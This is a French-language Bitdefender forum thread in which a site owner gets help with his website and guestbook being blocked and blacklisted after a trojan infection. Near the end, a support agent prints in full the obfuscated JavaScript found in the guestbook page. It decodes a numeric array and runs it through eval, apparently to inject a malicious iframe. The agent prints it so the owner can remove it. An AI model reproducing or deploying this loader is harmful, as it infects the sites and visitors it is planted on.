Problème Avec Un Site Non Accessible

Arnwald
Modifié (décembre 2012) dans Aide à la désinfection

Bonjour,


Nous avons installé depuis quelques jours Bitdefender 2013 sur ma machine. Mon site personnel avait été infecté par un trojan mais a été netoyé.


Je l'ai scanné plusieurs fois avec différents outils en ligne et j'ai, à chaque fois, eu la confirmation que mon site était maintenant propre.


Toutefois, je ne peux toujours pas accéder à mon site car Bitdefender m'en refuse l'accès...


Que puis-je faire ?


Site : http://www.arnwald.be


Merci d'avance.


Arnaud

Réponses


  • Bonjour,


    Nous avons installé depuis quelques jours Bitdefender 2013 sur ma machine. Mon site personnel avait été infecté par un trojan mais a été netoyé.


    Je l'ai scanné plusieurs fois avec différents outils en ligne et j'ai, à chaque fois, eu la confirmation que mon site était maintenant propre.


    Toutefois, je ne peux toujours pas accéder à mon site car Bitdefender m'en refuse l'accès...


    Que puis-je faire ?


    Site : http://www.arnwald.be


    Merci d'avance.


    Arnaud

    bonjour arnawal,


    effectivement ton site est bloquer par bd.


    je pense a un faux positif.


    bon week end.

  • bonjour arnawal,


    effectivement ton site est bloquer par bd.


    je pense a un faux positif.


    bon week end.

    re bonjour arnawald,


    -yann- pourra faire remonter l'info au developpeur lundi matin car le week end il n'y a personne du support technique.


    bon week end.

  • Roby Net
    Modifié (décembre 2012)

    Apparemment un autre antivirus (allemand) n'aime pas non plus ce site, les rubriques ne sont pas accessibles.


    ATTENTION TROJANS!!!

  • trojan.Agent.JS.ED

  • bonjour,


    c'est normal que l'autre editeur antivirus detecte la mm chose car il a le moteurs d’analyse antivirus de bitdefender (moteur a).


    bon week end.

  • bonjour,


    c'est normal que l'autre editeur antivirus detecte la mm chose car il a le moteurs d’analyse antivirus de bitdefender (moteur a).


    bon week end.

    bonjour,


    moi je pense a un faux positif,apres je ne suis pas un expert.


    le support technique pourra analyser tous cela et dira si oui ou non il y a infection ou faux positif.


    bon week end.

  • Arnwald
    Modifié (décembre 2012)

    Merci beaucoup. J'attendrai la semaine prochaine alors histoire de savoir ce que dit le support technique...


    Auaparavant, avec le trojan, le site était tout déstructuré mais depuis que j'ai netoyé, apparemment, il est normal selon des personnes qui ont pu le visiter.


    Toutefois, s'il est effectivement encore infecté, quelles sont mes options ?


  • Merci beaucoup. J'attendrai la semaine prochaine alors histoire de savoir ce que dit le support technique...


    Auaparavant, avec le trojan, le site était tout déstructuré mais depuis que j'ai netoyé, apparemment, il est normal selon des personnes qui ont pu le visiter.


    Toutefois, s'il est effectivement encore infecté, quelles sont mes options ?

    bonsoir arnawald,


    pour je pense a un faux positif,apres d'autres personnes pensent autrement.


    comme je le dit plus haut je ne suis pas expert,les experts sont les personnes du support technique.


    quel etais le nom du trojan?


    apres tu peut faire un scan du systeme.


    des que le scan est terminer envoye le rapport.


    bonne soiree et bon week end.

  • Bonjour Arnawald,


    Nous allons vérifier ce site et s'il s'agit d'un faux positif, il ne sera plus détecté dans la journée.


    Sinon concernant votre message, il n'est pas posté au bon endroit, je le déplace.


    Ensuite, merci d'éviter d'écrire tout en gras l'ensemble de votre message, cela ne se fait pas.


    Cordialement,


    Yann


  • Bonjour Arnawald,


    Nous allons vérifier ce site et s'il s'agit d'un faux positif, il ne sera plus détecté dans la journée.


    Sinon concernant votre message, il n'est pas posté au bon endroit, je le déplace.


    Ensuite, merci d'éviter d'écrire tout en gras l'ensemble de votre message, cela ne se fait pas.


    Cordialement,


    Yann



    Merci beaucoup, je peux enfin accéder à mon site. par contre, mon guestbook reste bloqué...


    Pourriez-vous jeter un coup d'oeil si il s'agit du même problème ?


    Merci encore.


  • Merci beaucoup, je peux enfin accéder à mon site. par contre, mon guestbook reste bloqué...


    Pourriez-vous jeter un coup d'oeil si il s'agit du même problème ?


    Merci encore.


    bonsoir arnawald,


    effectivement bitdefender bloque ton guestbook,Trojan.Agent.JS.ED.


    -yann- pourra t'en dir plus la semaine prochaine.


    bon week end.


  • bonsoir arnawald,


    effectivement bitdefender bloque ton guestbook,Trojan.Agent.JS.ED.


    -yann- pourra t'en dir plus la semaine prochaine.


    bon week end.



    Ok, merci. Car je ne sais pas trop comment je peux désinfecter celui-ci, si il est vraiment infecté...


  • Ok, merci. Car je ne sais pas trop comment je peux désinfecter celui-ci, si il est vraiment infecté...


    bonjour arnawald,


    je ne pense pas que tu soit infecter.


    essaye de scanner le systeme et post le rapport içi.


    bon week end.

  • Bonjour Arnawald,


    Nous allons vérifier la page correspondant à votre guestbook, s'il s'agit d'un faux positif, il sera débloqué demain.


    Cordialement,


    Yann


  • Bonjour Arnawald,


    Nous allons vérifier la page correspondant à votre guestbook, s'il s'agit d'un faux positif, il sera débloqué demain.


    Cordialement,


    Yann



    Bonjour,


    Maintenant, mon site est blacklisté par google... et j'ai aucune idée de comment je peux arranger ça... Je ne sais pas à quoi c'est dû car je n'ai pas modifié mon site depuis un bail...


    Est-ce que quelqu'un pourrait me donner un coup de main ?


    Merci d'avance...


    Arnaud


  • Bonjour,


    Maintenant, mon site est blacklisté par google... et j'ai aucune idée de comment je peux arranger ça... Je ne sais pas à quoi c'est dû car je n'ai pas modifié mon site depuis un bail...


    Est-ce que quelqu'un pourrait me donner un coup de main ?


    Merci d'avance...


    Arnaud


    bonsoir arnawald,


    je viens de voir que si l'on veut acceder a ton site il y a un avertissement de google.


    moi a mon niveau je ne peut rien faire,il faut attendre demain pour que -yann- t'en disent plus.


    si possible essaye de venir regulierement sur le forum,car si -yann- t'envoye des procedures a effectuer et que tu viens quelques jours apres ton probleme risque de durer longtemps.


    bonne soiree.


  • bonsoir arnawald,


    je viens de voir que si l'on veut acceder a ton site il y a un avertissement de google.


    moi a mon niveau je ne peut rien faire,il faut attendre demain pour que -yann- t'en disent plus.


    si possible essaye de venir regulierement sur le forum,car si -yann- t'envoye des procedures a effectuer et que tu viens quelques jours apres ton probleme risque de durer longtemps.


    bonne soiree.



    Certes, mais son dernier message parlait d'une vérification de la page du guestbook, j'attendais de voir si il y avait un quelconque résultat.


    Merci pour ta réponse rapide. J'attendrai donc demain voir ce qu'il en est.


    Bonne soirée !


  • Certes, mais son dernier message parlait d'une vérification de la page du guestbook, j'attendais de voir si il y avait un quelconque résultat.


    Merci pour ta réponse rapide. J'attendrai donc demain voir ce qu'il en est.


    Bonne soirée !


    bonsoir arnawald,


    ok je pense que demain -yann- t'en dira plus.


    bonne soiree.

  • Si ça peut aider, j'ai scanné mon site avec URL Void et il m'a trouvé "Blackhole Exploit Kit".


    Concernant Google, j'ai suivi les liens jusqu'aux outils du webmaster. Ca m'a amené à voir qu'ils avaient repéré un lien lié à un logiciel malveillant. J'ai viré la page étant donné que c'était un résidu d'une ancienne mouture du site.


    Voilà, comme ça, vous avez plus de détails.


    Merci encore.


    Arnaud

  • Bonjour Arnawald,


    Le site n'est plus détecté à l'heure à laquelle je vous écris.


    Il a effectivement, il y a 5 mois, été bloqué par Google Safebrowsing également, parce qu'il était certainement infecté.


    Cordialement,


    Yann


  • Bonjour Arnawald,


    Le site n'est plus détecté à l'heure à laquelle je vous écris.


    Il a effectivement, il y a 5 mois, été bloqué par Google Safebrowsing également, parce qu'il était certainement infecté.


    Cordialement,


    Yann



    Bonjour Yann,


    Je viens de lire votre réponse, mais en allant, dans la foulée sur mon site en ligne, je reçois toujours une annonce de page malveillante.


    Lorsque je recherche sur google, l'avertissement est également toujours présent... :(


    Arnaud

  • Bonjour Arnawald,


    Concernant le blocage de Google, vous êtes vous rendur sur cette adresse pour contacter Google ?


    http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fwww.arnwald.be%2F&client=googlechrome&hl=en-US


    Egalement, essayez cette adresse :


    http://www.stopbadware.org/firefox?hl=fr&url=http%3A%2F%2Fwww.arnwald.be%2FMenu4-fr.html


    Concernant Bitdefender, je vous confirme que le site n'est plus bloqué, videz le cache de votre navigateur et actualisez la page.


    Cordialement,


    Yann

  • Oui, j'ai suivi les instructions et supprimé la page infectée selon eux.


    Il est indiqué que je peux demander un scann de google pour rétablir la situation, mais vu que j'ai scanné mon site avec l'outil en ligne URL Void et qu'il me trouve ce "Blackhole Exploit Kit", je pense que le site ne doit pas encore être sain, ou me tromperais-je ? Je ne sais pas vraiment ce qu'est cette menace exactement...

  • Bonjour Arnawald,


    Envoyez-moi le résultat (en copie d'écran) de ce scan réalisé en ligne.


    Merci.


    Cordialement,


    Yann

  • envoyé.


    Merci.

  • Bonjour Arnawald,


    Avg doit se baser sur le blocage de Google Safebrowsing, car il est le seul encore à considérer que votre site est infecté (il faut qu'ils mettent à jour leur base pour retirer votre sitte). Voici le résultat du scan fait par les différents scanner web par l'intermédiaire de Virus Total :


    https://www.virustotal.com/url/b916a563a268e150b46bb8c29074db480532fbefa6a0777a07cc35e9ba9377d7/analysis/1357556000/


    Cordialement,


    Yann

  • Ok, merci, donc, je ne dois plus que demander à Google de rescanner mon site ?

  • Bonjour Arnawald,


    A priori Mcaffee site advisor aurait blacklisté votre site également, d'après la vérification faite sur ce site :


    http://sitecheck.sucuri.net/scanner/


    Mais de notre côté, je vous rappelle que votre site n'est plus détecté.


    Cordialement,


    Yann

  • Bonjour Arnawald,


    Oui il faut demander à Google de revérifier votre site pour qu'ils le retire de leur blacklist.


    Cordialement,


    Yann

  • Ok... merci...


    Il faut que je les contacte également donc ou via google tout sera dans l'ordre ?

  • Bonjour Arnawald,


    Je ne peux pas vous donner plus d'informations concernant Mcaffee, je ne sais pas comment ils fonctionnent.


    Cordialement,


    Yann

  • Ok, un grand merci pour votre aide en tous cas !


    Si je peux me permettre encore une question, rien à voir cependant avec mon site...


    Mais lorsque je recherche quelque chose sur google, parfois bitdefender me montre un point vert ou rouge, donc pour la santé des sites, mais souvent, je n'ai pas ces indications...


    Pouvez-vous me dire si c'est normal ?


  • Bonjour Arnawald,


    Je ne peux pas vous donner plus d'informations concernant Mcaffee, je ne sais pas comment ils fonctionnent.


    Cordialement,


    Yann


    bonjour -yann- et arnawald,


    c'est bizarre car hier soir j'ai scanner le site avec virustotal et rien n'a etes trouver resultat a 0.


    bonne journee.

  • Bonjour Arnawald,


    Cela arrive que search advisor n'est pas le temps d'afficher les informations sur la recherche effectuée, actualisez la page quand cela arrive.


    Cordialement,


    Yann

  • Ok, merci beaucoup pour toutes ces indications !


    Bonne journée !

  • Voilà, mon site est débloqué.


    Toutefois, mon guestbook reste bloqué par bitdefender, c'est normal ?


  • Voilà, mon site est débloqué.


    Toutefois, mon guestbook reste bloqué par bitdefender, c'est normal ?


    bonsoir arnawald,


    regarde dans les parametres puis dans vie privee si search advisor et sur on ou off.


    bonne soiree.


  • Voilà, mon site est débloqué.


    Toutefois, mon guestbook reste bloqué par bitdefender, c'est normal ?


    bonsoir arnawald,


    effectivement ton guestbook est encore bloquer par bd,mais ton site est encore blacklister par macaffe.


    par contre le scan virustotal ne donne rien.


    -yann- t'en dira plus demain.


    bonne soiree.

  • Bonjour.


    Alors... Je ne le fais pas exprès et pour tout dire, ça commence vraiment à me peser...


    J'ai fait rescanner par google, le site a été "libéré" des annonces de blocage... et aujourd'hui, je retourne sur mon site... de nouveau l'avertissement de page malveillante....


    J'en ai marre... Je n'ai rien changé à mon site depuis belle lurette, j'ai rescanné avec virus total et cette fois CLEAN MX me trouve un virus.


    Apparemment, mon site a été scanné via virus total hier, mais pas par mes soins...


    Serait-ce à cause de mon guestbook toujours bloqué par Bitdefender?


    Bonne journée.


    Arnaud

  • Bonjour Arnawald,


    Je me renseigne pour la partie Guestbook, pour savoir si son blocage est légitime ou non.


    Effectivement le site est de nouveau repéré par malveillant par Google.


    Cordialement,


    Yann

  • Ok, merci.


    Et pour le malware qui est probablement sur mon site, comment puis-je savoir ce qui est à virer.


    Est-ce que ça suffirait que je vire tout mon site, que je remette tous les fichiers de mon pc en changeant les mots de passe ?


    J'ai contacté OVH, mais ils sont d'une piètre aide. A part me renvoyer vers des liens généraux qui n'ont pas grand chose à voir avec mes problèmes...


    Je pense qu'à l'avenir je changerai d'hébergeur, vu le peu d'importance qu'ils accordent à l'aide envers leur clients...

  • Bonjour Yann,


    Aurais-tu des nouvelles concernant mon guestbook?


    Merci.


    Arnaud

  • Toujours rien pour le guestbook bloqué par Bitdefender?

  • Bonjour Arnawald,


    J'ai relancé mes collègues car lors de mon dernier message, cette partie de votre site n'était plus détectée.


    Cordialement,


    Yann

  • Bonjour Arnawald,


    Je vous informe qu'après nouvelle analyse, la page permettant d'afficher votre Guestbook (http://www.arnwald.be/agb/index.php) est logiquement bloqué. Un ****** est présent à la fin du code, il injecte un Iframe que je vous donne ci-dessous. Il faudrait vérifier la sécurité de votre site, car ce ****** a été injecté certainement en utilisant une faille présente dans votre code ou les ressources que vous utilisez. Vérifiez les logs de vos serveurs pour voir s'il y a eu des accès bizarres, puis changez les login et mot de passe d'accès à votre compte chez votre hébergeur.


    Voici le code de ce ****** qui se trouve tout à la fin du code de votre page que vous devez supprimer :


    <****** type="text/javascript" language="javascript" > v="v"+"al";if(020===0x10&&window.document)try{window.document.body=window.document.body}catch(gdsgsdg)


    {w=window;v="e"+v;e=w[v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97


    ,113,30,98,98,120,111,118,30,61,31,98,111,98,115,109,100,108,116,45,97,114,100,95


    ,116,100,67,108,100,107,101,109,114,40,38,103,102,113,95,109,100,37,41,58,11,10,1


    2,8,32,31,30,32,97,97,122,110,117,46,114,112,99,31,59,32,38,102,116,115,110,58,46


    ,45,118,115,113,46,114,99,47,118,110,45,98,109,110,115,99,110,115,45,99,107,105,4


    6,111,102,112,38,57,13,9,30,32,31,30,98,98,120,111,118,44,115,115,119,108,100,44,


    112,110,113,105,115,103,111,109,30,61,31,37,97,97,113,111,107,115,116,100,37,59,1


    2,8,32,31,30,32,97,97,122,110,117,46,114,114,121,107,99,46,97,109,114,99,99,114,3


    1,59,32,38,46,39,58,11,10,31,30,32,31,96,99,121,109,119,45,113,116,120,106,101,45


    ,102,101,104,101,104,115,30,61,31,37,49,111,118,39,58,11,10,31,30,32,31,96,99,121


    ,109,119,45,113,116,120,106,101,45,117,105,99,114,104,31,59,32,38,47,112,119,37,5


    9,12,8,32,31,30,32,97,97,122,110,117,46,114,114,121,107,99,46,107,99,102,115,30,6


    1,31,37,49,111,118,39,58,11,10,31,30,32,31,96,99,121,109,119,45,113,116,120,106,1


    01,45,114,111,111,30,61,31,37,49,111,118,39,58,11,10,12,8,32,31,30,32,104,100,32,


    39,31,100,110,97,117,108,99,110,115,44,103,100,114,69,107,99,109,100,108,116,65,1


    19,73,99,38,39,97,97,122,110,117,39,40,39,32,122,11,10,31,30,32,31,30,32,31,30,10


    0,110,97,117,108,99,110,115,44,119,113,103,116,100,38,39,59,98,105,117,30,105,99,


    59,92,38,96,99,121,109,119,91,37,62,59,45,100,104,116,62,38,39,59,12,8,32,31,30,3


    2,31,30,32,31,98,111,98,115,109,100,108,116,45,101,101,115,67,108,100,107,101,109


    ,114,66,120,71,100,39,37,98,98,120,111,118,37,41,45,95,112,111,99,110,99,65,104,1


    04,106,100,39,96,99,121,109,119,40,57,13,9,30,32,31,30,125,12,8,125,40,38,41,58);


    }w=f;s=[];for(i=0;-i+494!=0;i+=1){j=i;if(e&&(031==0x19))s=s+String.fromCharCode((1*w[j]+j%3));}e(s)</******>


    Cordialement,


    Yann

  • Merci beaucoup.


    Apparemment, tout le dossier de mon guestbook est infecté. J'ai essayé de le rapatrier sur mon ordinateur pour désinfecter et ainsi éviter de perdre les messages, mais Bitdefender m'a quasi tout viré...


    Existe-t-il une solution où je pourrais encore récupérer les messages ou est-ce perdu d'avance ?


  • Merci beaucoup.


    Apparemment, tout le dossier de mon guestbook est infecté. J'ai essayé de le rapatrier sur mon ordinateur pour désinfecter et ainsi éviter de perdre les messages, mais Bitdefender m'a quasi tout viré...


    Existe-t-il une solution où je pourrais encore récupérer les messages ou est-ce perdu d'avance ?


    bonsoir arnawald,


    regarde si bd ne les aurait pas mis en quarantaine.


    bonne soiree.

  • Bonjour Arnawald,


    Il faut simplement rapatrier la page d'index de votre guestbook et supprimer le ****** qui apparaît à la fin de la page (celui que je vous ai indiqué) pour ensuite réinjecter la page sur votre espace d'hébergement. Je ne vois pas de commentaires infectés (ou plutôt comportant du code suspect). D'ailleurs il faudrait vous poser des questions sur la sécurité des scripts que vous avez insérer dans votre site, notamment celui qui vous permet d'avoir ce guestbook.


    Je ne peux vous en dire plus, nous ne pouvons offrir de services de sécurisation de site, mais vous pourrez sans doute trouver de l'aide sur internet à ce sujet.


    Cordialement,


    Yann

  • Ok, encore un tout grand merci pour votre précieuse aide !


    Bon week-end :)


    Arnaud